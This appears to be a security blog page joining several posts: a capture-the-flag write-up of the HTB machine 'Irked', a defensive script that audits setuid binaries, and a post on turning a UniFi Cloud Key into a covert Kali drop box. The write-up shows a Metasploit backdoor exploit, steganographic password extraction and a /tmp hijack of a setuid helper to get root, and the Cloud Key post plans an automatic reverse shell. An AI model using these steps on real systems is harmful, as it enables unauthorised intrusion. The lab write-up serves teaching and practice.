I recently gave a quick talk as an introduction to Qubes OS at SecIC, a local CitySec meetup. I’ve been using Qubes OS off and on for a while and recently bought a ThinkPad x230 to dedicate to running it. The slides are available below and I’ll link to the talk once it is uploaded.
HTB: Irked
As usual, we will start off with an nmap scan.
```
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
34271/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
```
Looks like irc is running on a couple of ports as well as httpd. Taking the name of the box into account, it's probably safe to assume irc is the way in, but first let's look at the website.
Hmm, let's pull down that jpg for later.
A quick google of UnrealIRCd turns up a backdoor in the 3.2.8.1 release (CVE-2010-2075), and there is a Metasploit module for it. Let's set it up against port 8067 and see what we get.
```
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  10.10.10.117     yes       The target address
   RPORT  8067             yes       The target port (TCP)
```
It works, and we get dropped into a shell as the user ircd.
```
whoami
ircd
```
Looking through home directories, there are a couple interesting files found in another user’s Documents directory.
```
/home/djmardov/Documents$ ls -lah
total 16K
drwxr-xr-x  2 djmardov djmardov 4.0K May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4.0K Nov 23 10:40 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt
```
Catting out the .backup file gives us a password and a bit of a hint.
```
Super elite steg backup pw
UP********************ss
```
Now we have a password and a hint pointing to stego. Let's look at the jpg we downloaded earlier with steghide.
```
steghide extract -sf irked.jpg
```
This gives us another file, pass.txt.
```
Ka************HG
```
Using that password to ssh in as the user that owned the file (djmardov), we now have access to user.txt and a clean shell.
```
cat user.txt
4a****************************8e
```
After a bit of enumeration, we find an executable with an interesting name.
```
find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount
```
Running that gives us one more hint. It looks like it's calling another file.
```
/usr/bin/viewuser
(unknown) :0           2018-11-22 12:34 (:0)
sh: 1: /tmp/listusers: not found
This application is being devleoped to set and test user permissions
It is still being actively developed
```
Creating a file containing /bin/bash in that location and running it again gives us a root shell and the root flag.
```
echo "/bin/bash" > /tmp/listusers
chmod +x /tmp/listusers
/usr/bin/viewuser
(unknown) :0           2018-11-22 12:34 (:0)
whoami
root
cat /root/root.txt
8d****************************f3
```
NOTE: We do not actually need the djmardov user for this. The privesc can be done from the ircd user, and the user flag can then be read as root. This is, however, probably not the intended path.
This was a pretty direct machine; however, the use of stego to hide a password is a little unrealistic. A few of the new machines being added to the active lineup have been more real-world, for example DevOops, which makes them a bit more fun.
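As an added example (not part of the original writeup), here is a small audit script in the spirit of the find command above: it lists setuid-root binaries and flags any whose contents reference a path under /tmp, /var/tmp or /dev/shm, the pattern that made viewuser's call to /tmp/listusers a privesc. The directory list and the path regex are my assumptions; extend them for site-specific locations.

```python
#!/usr/bin/env python3
"""Audit setuid-root binaries for hard-coded paths under world-writable dirs.

Constructed example, not code from the Irked box or the original post.
A setuid helper that executes a file under /tmp (as /usr/bin/viewuser does
with /tmp/listusers) lets any local user supply that file, so a defender
wants to find such references before an attacker does.
"""
import os
import re
import stat
import sys

# Assumption: the usual sticky-bit scratch directories. Matches only when a
# file name follows the directory, so a bare "/tmp/" string is not flagged.
PATH_RE = re.compile(rb"(?:/tmp|/var/tmp|/dev/shm)/[A-Za-z0-9._-][A-Za-z0-9._/-]*")


def is_suid_root(mode: int, uid: int) -> bool:
    """True for a regular file that has the setuid bit and is owned by uid 0."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def suspicious_paths(data: bytes) -> list:
    """Return the distinct world-writable paths referenced in a blob of bytes."""
    found = []
    for m in PATH_RE.finditer(data):
        p = m.group(0).decode("ascii")
        if p not in found:
            found.append(p)
    return found


def find_suid_root(root: str = "/") -> list:
    """Walk the tree the way `find / -user root -perm -4000` does."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Pseudo-filesystems hold no on-disk binaries; skip them.
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in ("/proc", "/sys", "/dev")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if is_suid_root(st.st_mode, st.st_uid):
                hits.append(path)
    return hits


def audit(root: str = "/") -> dict:
    """Map each setuid-root binary to the world-writable paths it references."""
    report = {}
    for path in find_suid_root(root):
        try:
            with open(path, "rb") as f:
                refs = suspicious_paths(f.read())
        except OSError:
            continue
        if refs:
            report[path] = refs
    return report


if __name__ == "__main__":
    start = sys.argv[1] if len(sys.argv) > 1 else "/"
    for binary, refs in audit(start).items():
        print(f"{binary}: {', '.join(refs)}")
```

Run it as root so every setuid binary is readable; on Irked it would report /usr/bin/viewuser with /tmp/listusers, while a clean host should print nothing.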
Unifi Kali Key?
I have used UniFi/Ubiquiti network products for quite some time now. I've deployed their hardware at many past customers and use it for most of my home network. Recently, I had to manually update the firmware on my Cloud Key via a shell and did some poking around on it. It seems to just be an ARM device running Debian with some software installed. Since it accepts POE for power and looks pretty innocuous in a network rack, I thought it would be an interesting device to get some of the Kali tool-set running on.
To start off, here is a link to the official product page. This device is a purpose-built "server" which runs Ubiquiti's UniFi controller software, is powered over POE, has an SD card slot, and has a simple web interface for managing the device itself. Ubiquiti offers a "cloud" management system as well, allowing network management over the Internet, hence the name Cloud Key. As for hardware specs, it has 2Gb of RAM, 16Gb of onboard MMC storage, and a quad-core ARM CPU. There have been some hardware revisions, it seems, and I believe what I have here is a third generation unit, which includes USB C for external power and a physical power button.
After powering it up and getting SSHed in, I started snooping around the Debian install.
```
root@UniFi-CloudKey:~# uname -a
Linux UniFi-CloudKey 3.10.20-ubnt-mtk #2 SMP PREEMPT Mon Jan 8 12:40:11 PST 2018 armv7l GNU/Linux
```
```
root@UniFi-CloudKey:~# lspci
pcilib: Cannot open /proc/bus/pci
lspci: Cannot find any working access method.
```
```
root@UniFi-CloudKey:~# lscpu
Architecture:          armv7l
Byte Order:            Little Endian
CPU(s):                4
On-line CPU(s) list:   0-3
Thread(s) per core:    1
Core(s) per socket:    4
Socket(s):             1
CPU max MHz:           1300.0000
CPU min MHz:           598.0000
```
```
root@UniFi-CloudKey:~# lsblk
NAME         MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
mmcblk0rpmb  179:96   0    4M  0 disk
mmcblk0boot0 179:32   0    4M  1 disk
mmcblk0boot1 179:64   0    4M  1 disk
mmcblk0      179:0    0 14.7G  0 disk
|-mmcblk0p1  179:1    0  512K  0 part
|-mmcblk0p2  179:2    0  256K  0 part
|-mmcblk0p3  179:3    0  256K  0 part
|-mmcblk0p4  179:4    0   32M  0 part
|-mmcblk0p5  179:5    0   32M  0 part
|-mmcblk0p6  179:6    0    1G  0 part /mnt/.rofs
|-mmcblk0p7  179:7    0    3G  0 part /mnt/.rwfs
`-mmcblk0p8  179:8    0 10.6G  0 part /srv
mmcblk1      179:128  0  7.4G  0 disk
`-mmcblk1p1  179:129  0  7.4G  0 part /data
mtdblock0     31:0    0   64K  1 disk
mtdblock1     31:1    0  960K  0 disk
```
```
root@UniFi-CloudKey:~# free -m
             total       used       free     shared    buffers     cached
Mem:          2017        715       1302          5        124        420
-/+ buffers/cache:        170       1847
Swap:            0          0          0
```
```
root@UniFi-CloudKey:~# df -h
Filesystem                     Size  Used Avail Use% Mounted on
aufs-root                      2.9G  354M  2.6G  13% /
udev                            10M     0   10M   0% /dev
tmpfs                          404M  396K  404M   1% /run
/dev/disk/by-label/userdata    2.9G  354M  2.6G  13% /mnt/.rwfs
/dev/disk/by-partlabel/rootfs  291M  291M     0 100% /mnt/.rofs
tmpfs                         1009M     0 1009M   0% /dev/shm
tmpfs                          5.0M     0  5.0M   0% /run/lock
tmpfs                         1009M     0 1009M   0% /sys/fs/cgroup
tmpfs                         1009M     0 1009M   0% /tmp
/dev/mmcblk0p8                  11G  137M   11G   2% /srv
/dev/mmcblk1p1                 7.2G   17M  7.2G   1% /data
```
```
root@UniFi-CloudKey:~# apt list --installed
Listing... Done
[full package listing omitted]
```
I eventually found some interesting ubnt-* tools. These are used for firmware- and service-related tasks, and it looks like some features are duplicated across the different tools.
```
root@UniFi-CloudKey:~# ubnt-unifi-setup
Usage: /usr/sbin/ubnt-unifi-setup start|stop
```
```
root@UniFi-CloudKey:~# ubnt-systool
Ubiquiti system tools, v1.0
Usage: /sbin/ubnt-systool[]
supported commands:
    timezone
    hostname
    network
    fwupdate
    fwupdatestatus
    resetbutton <true|false>
    pwcheck
    chpasswd
    adminname
    reboot
    poweroff
    reset2defaults
    cleanup
    led
```
```
root@UniFi-CloudKey:~# ubnt-tools
Ubiquiti system tools
Copyright 2006-2015, Ubiquiti Networks, Inc. <support@ubnt.com>
This program is proprietary software; you can not redistribute it and/or modify it without signed agreement with Ubiquiti Networks, Inc.
    bgnd
    ubnt-discover
    infctld
    pwcheck
    fwupdate
    fwinfo
    fsync
    hwaddr
    sysusermerge
```
With all that out of the way, I decided to try to just add the Kali repo and install something from it. First I need to install nano, I guess.
I added the Kali repo, added the gpg key for their repo, updated package lists, then tried to install metasploit.
```
echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list
apt-key adv --recv-keys --keyserver keyserver.ubuntu.com 7D8D0BF6
apt update
apt install metasploit-framework
```
And metasploit works!
With that being a success, there are a few issues that need to be addressed. First, the UniFi controller software is still running, possibly spewing packets onto the network looking for APs and switches. That, along with some other unneeded software, can easily be removed. Second, due to how the onboard MMC storage is partitioned, the root filesystem only has about 1.5G left after the MSF install. I'm sure I can find a way to use the other partitions or the SD card for storage; I'll work on that later, since it's not breaking anything yet. Third, I need to set up an automatic reverse shell, since the intent is to not be logging into this thing locally. And lastly, some encrypted storage probably wouldn't be a bad idea either.
Part two is coming soon…